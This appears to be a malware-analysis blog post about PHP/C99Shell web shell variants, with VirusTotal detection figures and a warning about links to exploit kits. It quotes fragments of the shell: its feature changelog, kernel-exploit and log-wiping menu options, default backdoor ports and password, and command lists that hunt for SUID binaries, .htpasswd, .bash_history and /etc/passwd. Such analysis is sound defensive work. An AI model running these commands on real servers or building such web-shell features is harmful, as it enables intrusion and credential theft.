<OPTION VALUE="./zap2">WIPELOGS PT3
<OPTION VALUE="wget">Kernel attack (Krad.c) PT1 (If wget installed)
<OPTION VALUE="./k3 1">Kernel attack (Krad.c) PT2 (L1)
<OPTION VALUE="./k3 2">Kernel attack (Krad.c) PT2 (L2)
<OPTION VALUE="./k3 3">Kernel attack (Krad.c) PT2 (L3)
<OPTION VALUE="./k3 4">Kernel attack (Krad.c) PT2 (L4)
<OPTION VALUE="./k3 5">Kernel attack (Krad.c) PT2 (L5)

And this dangerous mess is detected on VT as below:
MD5: fcd5b6c2d745270b7cf3ae880d7c914b
File size: 185.7 KB ( 190154 bytes )
File name: About-the-UAE.html
File type: HTML
Tags: html
Detection: 18 / 43
Analysis date: 2012-09-29 15:41:42 UTC ( 1 day, 16 hours ago )
URL:---------->>[VIRUSTOTAL]
↑OK, it seems like the more dangerous the PHP/C99Shell, the lower the detection rate? (smile), so let's pick the most dangerous one and see what happens!

TYPE #3 - The very Dangerous Type of PHP/C99Shell

The source was here:
           => `25271.jpg'
Connecting to||:80... connected.
HTTP request sent, awaiting response... 200
This is a very sophisticated model. I am sure you'll agree once you see the code.. You can read the comments below in the source code-->>[PASTEBIN] As with types 1 and 2 above, this one has additional functions, and the author was so kind (= so foolish) as to explain all the functions & future development:
*  sniperxcode, a modded sniperxcode, which is a: $count=0; while($count==0){ echo ' mod of a'; }
*  By ssniperxcode - the 11-year-old hacker :)
*  Greetz to all my friends in #lobby
*  A big, fat "fuck you" to:
*   - HellBound Hackers (you're also part of the next on the list, except you can't even deface!)
*   - people who deface because they can't root and think they're 1337
*   - idiots who add mail() to their shells so they can log your ownages
*   - idiots who add mail() to their shells so they can log your ownages and mess up the variables so it doesn't even work!
*   - MPAA, RIAA, and all those other arse-hole anti-p2p organizations
*  lack of money and parental freedom leaves me with no site to advertise xD
*  Newer Mods (added by me) for v2 --
*  fixed a bug where deleting something from a path that has a space in it would return you to an invalid dir
*  fixed the *nix aliases where the cmds were in the name and the names were executed :S
*  added md5/sha1 file checksums
*  removed fgdump (no need for three programs that do the same f-ing thing :P) !!! 1 mb saved !!!
*  Old Mods (added by me) for v1 --
*  added the trojan executer
*  cleaned up the interface in general
*  added windows login hash grabber + sam/fg/pwdump2
*  added mass code injector (thanks SubSyn)
*  added pre-compiled h00lyshit and raptor_chown
*  added log cleaners for both *nix and windows
*  removed all the shitty/non-working functions in the drop-down boxes
*  fixed the google kernel thing (the search variables were fuxxed up)
*  made the dir listing easier to read with the alternating bgcolors
*  little optimizations in code here and there (i'm an optimization whore tbh)
*  submit md5/sha1 hash to cracking sites
*  made that awesome logo ;)
*  added the disabled php functions thing (took from r57shell)
*  added better windows/*nix-specific aliases
*  cleaned up the safe-mode bypass functions (wow, some of the shittiest code i've ever seen o_O )
*  wordlist md5/sha1 cracker
*  What I Plan to Do Next --
*  smaller size (somehow) :S
*  more sploits
*  allow input for dir to unpack exploits to
*  better trojans/backdoors
*  more functions/aliases
*  maybe move stuff around/change theme
*  make the php picture in the dir listing white for easier readability
*  take a first look at the sql section o.O
*  remove:
*   - more of those stupid spaces after every line
*   - more " and change them to ' for faster execution
*   - a bunch of other stupid code things (example:  echo("$msg");  (wtf... :S))
And he "really means it", with so many improvements, like the details below.. Straightforward password dumping code:
There goes your libc...
Trojan interaction:
Usage of tor...
Backdoor shell...
$bindport_pass = 'c99';  // default password for binding 
$bindport_port = '31373'; // default port for binding 
$bc_port = '5992'; // default port for back-connect 
$datapipe_localport = '8081'; // default port for datapipe 
And I am telling you, this model is improved A LOT:
  array('-----------------------------------------------------------', 'ls -la'),
  array('Currently Logged in Users', 'w'),
  array('Last User to Connect', 'lastlog'),
  array('Find Users Without a Password', 'cut -d: -f1,2,3 /etc/passwd | grep ::'),
  array('Is /etc Writable?', 'find /etc/ -type f -perm -o+w 2> /dev/null'),
  array('Installed Downloaders', 'which wget curl w3m lynx'),
  array('Open Ports', 'netstat -an | grep -i listen'),
  array('Box Uptime', 'uptime'),
  array('System Variables', 'set'),
  array('ARP table', 'arp -a'),
  array('Patch Level for RedHat 7.0', 'rpm -qa'),
  array('Network Interfaces', 'ifconfig'),
  array('Mounted Filesystems', 'mount'),
  array('Find Suid Bins', 'find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null'),
  array("Find All Suid Files", "find / -type f -perm -04000 -ls"), 
  array("Find Suid Files in Current Dir", "find . -type f -perm -04000 -ls"), 
  array("Find All Sgid Files", "find / -type f -perm -02000 -ls"), 
  array("Find Sgid Files in Current Dir", "find . -type f -perm -02000 -ls"), 
  array("Find Files", "find / -type f -name"), 
  array("Find config* Files", "find / -type f -name \"config*\""), 
  array("Find config* Files in Current Dir", "find . -type f -name \"config*\""), 
  array("Find All Writable Folders and Files", "find / -perm -2 -ls"), 
  array("Find All Writable Folders and Files in Current Dir", "find . -perm -2 -ls"), 
  array("Find All service.pwd Files", "find / -type f -name service.pwd"), 
  array("Find service.pwd Files in Current Dir", "find . -type f -name service.pwd"), 
  array("Find All .htpasswd Files", "find / -type f -name .htpasswd"), 
  array("Find .htpasswd Files in Current Dir", "find . -type f -name .htpasswd"), 
  array("Find All .bash_history Files", "find / -type f -name .bash_history"), 
  array("Find .bash_history Files in Current Dir", "find . -type f -name .bash_history"), 
  array("Find All .fetchmailrc Files", "find / -type f -name .fetchmailrc"), 
  array("Find .fetchmailrc Files in Current Dir", "find . -type f -name .fetchmailrc"), 
  array("List File Attributes on a Linux Second Extended File System", "lsattr -va"), 
Added an ARP table, IP config and net shares data grabber too...
 $cmdaliases = array( 
  array('-----------------------------------------------------------', 'dir'),
  array('Active Connections', 'netstat -an'),
  array('ARP Table', 'arp -a'),
  array('Net Shares', 'net use'),
  array('IP Configuration', 'ipconfig /all'),
  array('Disk Quotas', 'fsutil quota query '.$pd[0]),
  array('Drive Type', 'fsutil fsinfo drivetype '.$pd[0])
The Web GUI of the new functions is as follows (and many more..)

This part↓ is like what TYPE #2 has.. While the detection ratio on VT is:

MD5: 135bd38bc453bb440613196fd51c584e
File size: 541.7 KB ( 554744 bytes )
File name: 25271.jpg
File type: unknown
Tags: php
Detection: 31 / 43
Analysis date: 2012-09-29 15:17:15 UTC ( 1 day, 18 hours ago )
URL:---------->>[VIRUS-TOTAL]
The moral of this post is:
1. PHP/C99Shell malware is not dying, it has come back with better functions
2. The infection of C99Shell has risen again since Sept 28th 2012
3. Someone must pay attention to the commercial development of PHP/C99Shell
4. [BEWARE] The integration/connection between this malware and Exploit Kits is starting to be detected

!!NEW!! IMPORTANT! Additional: New types were also found as the days went by... here are the additional (new type) cases:
1. Please see the decoded part of the obfuscated .C code as tweeted by @Cephurs:
2. Please see the decoded part of the obfuscated ELF binary used as a backdoor, by @MalwareMustDie:
3. Please see the ELF server-hack exec binary wrapped in a TGZ, as mentioned by @KennyMacDermid: